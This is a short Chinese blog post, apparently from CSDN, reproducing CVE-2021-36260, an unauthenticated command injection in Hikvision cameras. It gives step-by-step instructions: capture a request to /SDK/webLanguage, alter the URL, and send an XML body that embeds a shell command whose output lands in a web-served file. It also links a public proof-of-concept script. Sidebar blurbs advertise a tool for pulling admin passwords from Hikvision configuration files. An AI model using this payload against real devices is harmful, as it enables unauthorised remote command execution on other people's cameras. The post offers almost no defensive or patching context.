海康威视摄像头命令注入 CVE-2021-36260

冬6325

已于 2023-05-23 18:31:20 修改

阅读量1.5k

点赞数 2

分类专栏：漏洞复现文章标签：安全

于 2023-05-23 18:22:10 首次发布

本文链接：https://blog.csdn.net/qq_14902381/article/details/130832841

版权

漏洞复现专栏收录该内容

4 篇文章 0 订阅

订阅专栏

记录工作中发现的问题

此漏洞无需账号密码就可以利用

先访问ip:port//SDK/webLanguage ，用burpsuite抓包

修改url 为 /x，

#payload：
<?xml version='1.0'encoding='UTF-8'?>
  <language>
     $(ifconfig -a > webLib/x.asp)
  </language>

也可以用poc：CVE-2021-36260/CVE-2021-36260.py at main · Aiminsun/CVE-2021-36260 · GitHub

优惠劵

冬6325

关注关注

2
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
海康威视摄像头命令注入 CVE-2021-36260

海康威视命令注入 CVE-2021-36260。
复制链接

扫一扫

专栏目录

海康linux 命令,海康摄像机命令行

weixin_35397235的博客

04-30

2714

BusyBox v1.2.1 Protect Shell (psh) ver: MT-1494accessDvrSwitchatclearExcepcloseIRISdbgGuidebugCmddebugDspdebugLogdecStatdialPowerCtrldisableHBdisableWatchdogdmesgdspStatusenable3GOSDenableHBenableWatc...

关于海康威视 摄像头的整理-附件资源

03-05

关于海康威视 摄像头的整理-附件资源

参与评论您还未登录，请先登录后发表或查看评论

HIKVISION海康威视代码执行漏洞复现(CVE-2021-36260)

红队是青春

01-27

5779

CVE-2021-36260，海康威视代码执行漏洞复现

海康摄像头CVE-2021-36260漏洞复现

qq_50854662的博客

01-09

6931

海康摄像头CVE-2021-36260漏洞复现

CVE-2017-7921海康威视配置文件解码(configfile解码)

12-11

该程序可以提取由于授权问题影响的多款Hikvision产品的configfile文件中的管理员账号密码。具体影响产品型号，请参考CVE-2017-7921；CVE-2017-7922漏洞详情。该程序发布，意在警醒相关单位及时更新相关设备，网络安全需要大家共同监督。(ps:工具不会使用可以私信我，直接差评的一律自理)

提权：CVE-2021-3560

守拙的博客

07-12

1080

CVE-2021-3560 一、漏洞名称： Linux Polkit权限提升漏洞二、漏洞编号： CVE-2021-3560 三、漏洞描述：由于linux的polkit组件错误处理了异常情况，导致权限提升。该漏洞能够使普通用户获取到root权限。四、影响版本：目前已知的版本情况。五、漏洞分析当一个命令被发送到目标程序处理时，消息发送方会被分配一个唯一总线名称（感觉有点像sessionid的意思）。当需要polkit去做权限校验时，polkit会通过唯一总线名称去查询命令发送方的U

hikvision_CVE-2017-7921配置文件解密.rar

05-20

具体影响产品型号，请参考CVE-2017-7921；CVE-2017-7922漏洞详情。该程序发布，意在警醒相关单位及时更新相关设备，网络安全需要大家共同监督。本程序需和配置文件存放在同一目录下运行exe即可配置文件名...

hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip

05-20

configurationFile配置文件解密

海康威视硬盘录像机DS-7104N-SN升级包

01-29

海康威视硬盘录像机DS-7104N-SN升级包。老版本的录像机了，这个升级包难找。官方没得下载分享给大家 V3.0.23_180720

海康威视越权访问CVE-2021-7921漏洞复现

归零者的博客

10-31

3384

海康威视越权访问CVE-2021-7921漏洞复现

怎样使用安全组？

2301_78491269的博客

05-23

348

目前，VPC 类型实例的数量上限是 2000，对所有 VPC 类型实例的安全组都生效。需要注意的是，上限 2000 指的是所有实例包含的私网 IP 个数（主网卡和辅助网卡共享此配额），而不是实例个数。说明：目前，一个实例中的每个弹性网卡默认最多可以加入 5 个安全组，所以一个实例的每个弹性网卡最多可以包含 500 条安全组规则，能够满足绝大多数场景的需求。不可以，每个安全组最多可以包含 100 条安全组规则。如果不存在冗余规则，请拆分安全组。每个安全组的入站规则与出站规则的总数不能超过 100。

【软考中级软件设计师】计算机网络和安全

shaozheng0503的博客

05-23

941

蠕虫病毒，作为一种高度自足的恶意软件，其核心特征在于其自我复制与传播能力，无需借助其他程序或人为操作即可在计算机网络中迅速蔓延。这类病毒利用操作系统或应用程序的安全漏洞，通过网络连接自动寻找新的宿主进行感染，其传播机制通常包括但不限于电子邮件、网络共享、即时消息等渠道。例如，“红色代码”病毒便是通过HTTP服务器的漏洞传播，而“爱虫病毒”则是通过电子邮件附件进行扩散，两者均展现了蠕虫病毒通过网络自我复制的特性。相比之下，“冰河”则被归类为远程控制木马（Trojan Horse），其运作模式与蠕虫截然不同。

内网安全之证书模版的管理

最新发布

weixin_45910629的博客

05-29

979

证书模板 Certificate templates 是 CA 证书颁发机构的一个组成部分，是证书策略中的重要元素，是用于证书注册、使用和管理的一组规则和格式。当 CA 收到对证书的请求时，必须对该请求应用一组规则和设置，以执行所请求的功能，例如证书颁发或更新。这些规则可以是简单的，也可以是复杂的，也可以适用于所有用户或特定的用户组。证书模板是在 CA 上配置并应用于传入证书请求的一组规则和设置。证书模板还向客户机提供了关于如何创建和提交有效的证书请求的说明。基于证书模板的证书只能由企业 CA 颁发。

企业如何安全的使用U盘

feng_321_的博客

05-29

483

U盘的随意使用可能导致未经授权的人员随意插拔U盘，增加了信息泄露的风险。对于已经确定的内部使用的U盘，可以对U盘进行加密，拷贝到U 盘里面的文件，然后他如果说把U盘拿出去用是需要先格式化的格式化完之后，才可以用。如果员工使用的U盘感染了病毒，那么病毒可能会通过U盘传播到企业的计算机系统中，导致系统瘫痪、数据损坏甚至丢失。：使用专门的设备控制软件，如安秉网盾终端管理系统，可以灵活地管理和控制USB设备的使用权限，指定哪些U盘可以使用，哪些不能使用。员工随意使用U盘可能会导致工作流程混乱，影响工作效率。

ModStartBlog v9.4.0 后台安全升级，已知问题修复

qq_26450889的博客

05-29

934

ModStart 是一个基于 Laravel 模块化极速开发框架。模块市场拥有丰富的功能应用，支持后台一键快速安装，让开发者能快的实现业务功能开发。系统完全开源，基于 Apache 2.0 开源协议。

海康威视摄像头ds-2cd3t10-i3连接电脑

09-15

要将海康威视摄像头DS-2CD3T10-I3连接到电脑上，您可以按照以下步骤进行操作： 1. 首先，确认您的电脑是否具备网络接口，以便与摄像头进行连接。如果您的电脑没有网络接口，您可以购买一个USB转网口的适配器。 2. 摄像头支持以太网连接，因此您需要一个以太网网线。将一端连接到摄像头的以太网口，另一端连接到电脑的以太网口或者路由器的以太网口。 3. 确保您的电脑和摄像头都在同一个局域网内。您可以通过设置您的电脑和摄像头的IP地址和子网掩码来实现。确保两者的IP地址段和子网掩码一致。 4. 打开您的电脑上的网络设置，查找并记下摄像头的IP地址。您可以使用海康威视提供的设备搜索工具来查找和配置摄像头的IP地址。 5. 打开您的电脑上的网络浏览器，输入摄像头的IP地址。您将会看到摄像头的登录页面。根据摄像头的手册，输入正确的用户名和密码进行登录。 6. 成功登录后，您就可以在浏览器中查看和控制摄像头的画面了。您可以调整摄像头的参数、查看实时视频、进行录像等操作。请注意，以上步骤只适用于将摄像头连接到电脑进行访问和控制。如果您希望通过互联网远程访问和控制摄像头，还需要进行额外的配置，例如设置端口映射、启用动态域名解析等。建议您在操作中参考相关的摄像头手册或者咨询专业人士的帮助。

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交